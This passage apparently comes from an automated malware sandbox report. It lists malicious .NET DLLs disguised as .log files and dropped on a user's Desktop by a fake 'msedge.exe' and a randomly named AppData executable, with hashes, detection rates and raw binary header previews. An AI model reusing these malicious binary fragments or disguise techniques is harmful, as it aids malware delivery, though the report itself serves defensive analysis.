Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: 7NrGfIpGYi.exe, Detection: malicious, Browse Filename: mqJJr1R3v4.exe, Detection: malicious, Browse Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse Filename: Cr4745ElZg.exe, Detection: malicious, Browse Filename: gh3zRWl4or.exe, Detection: malicious, Browse Filename: seoI30IZZr.exe, Detection: malicious, Browse Filename: 0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe, Detection: malicious, Browse Filename: e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exe, Detection: malicious, Browse Filename: p3f932IsTO.exe, Detection: malicious, Browse Filename: UpU2O6YQxG.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\EVLpKOHn.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GfhqKgmo.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JlazcluE.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MQUzRRxE.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\NKJXVMBv.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\NhvHKDkY.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TUtPMNAm.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UXzpIjDH.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VPYFfuwr.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VltWWbmg.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WpXNITDI.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XmyVeTRC.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\eGTFsMJp.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fZXNGngO.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iacMOeMk.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\rWRTdVVu.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uIZJMPyD.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\wDtsBZWh.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\zrKsasrd.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
